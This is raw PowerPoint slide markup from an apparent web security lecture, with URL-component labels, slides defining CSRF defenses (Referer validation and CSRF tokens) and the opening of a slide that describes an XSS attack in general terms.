              <a:spcBef>
                <a:spcPts val="244"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAEAC0EA-3BFE-2D49-8A77-1B7F2ADEDAA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509775" y="4488284"/>
            <a:ext cx="1003925" cy="723153"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123D4B65-9B22-2F48-96D2-5DC47A1EBE18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554537" y="4872037"/>
            <a:ext cx="914400" cy="274955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="914400" h="274954">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="914399" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914399" y="274637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADC11FB-D565-9A49-9873-55466D71A8AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5011737" y="4513046"/>
            <a:ext cx="12065" cy="349885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12064" h="349885">
                <a:moveTo>
                  <a:pt x="0" y="349688"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11905" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D78A91CA-1DE2-4346-A351-0D3AA85D615D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4554537" y="4872037"/>
            <a:ext cx="922019" cy="286385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="31114" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="190500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="244"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCDCA3F2-E6A5-8840-8149-57B6249DCA64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5438858" y="4519143"/>
            <a:ext cx="1381750" cy="989950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E19533-BDD5-AF44-A196-1E9AE0EC426E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5483621" y="5169692"/>
            <a:ext cx="1292225" cy="274955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1292225" h="274954">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1292224" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292224" y="274637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55D13AF4-0496-DF48-8A8E-23E7D294C911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5967933" y="4543905"/>
            <a:ext cx="81280" cy="603885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="81279" h="603885">
                <a:moveTo>
                  <a:pt x="81112" y="603786"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900235A8-112F-3046-9569-A84E9923E95B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5476279" y="5158183"/>
            <a:ext cx="1299845" cy="286385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="42544" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="226695">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="334"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Fragment</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355317912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682181-302A-AC47-BACC-2A4F1C12CECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAF58E5-3D52-0648-A223-06A6565A5822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Referer Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB991F9-D654-F44B-92F4-9A82EF06DC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651756" y="4724400"/>
            <a:ext cx="2301875" cy="330245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2301875" h="479425">
                <a:moveTo>
                  <a:pt x="0" y="239712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21578" y="193277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58675" y="163944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112527" y="136206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="123014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="149860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="178427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2292183" y="208462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2301875" y="239712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299426" y="255473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="479425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145356" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83582" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37956" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691" y="270962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="239712"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{328D7753-D74A-8640-9414-CA8757EAABB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2496670"/>
            <a:ext cx="6942916" cy="2795420"/>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87909055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682181-302A-AC47-BACC-2A4F1C12CECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAF58E5-3D52-0648-A223-06A6565A5822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>CSRF Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a unique, secret, unpredictable value generated by the server-side app and transmitted to the client;                   included in a subsequent HTTP request made by the client;                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server-side application validates that the request includes the expected token and rejects the request if the token is missing or invalid.</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409875293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682181-302A-AC47-BACC-2A4F1C12CECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAF58E5-3D52-0648-A223-06A6565A5822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>CSRF Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE632992-D71F-5B4D-83A2-DE47F4D70285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481476" y="2209800"/>
            <a:ext cx="8195615" cy="4614019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154740734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Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E5DB4FC-2855-DB42-9072-55BD7E0D1693}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="259080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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AE856C1-4887-9A41-869F-205558D20D0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3481626"/>
            <a:ext cx="9144000" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Attacker injects a malicious script into the  webpage viewed by a victim user;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Script runs in user’s browser with access to page’s data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
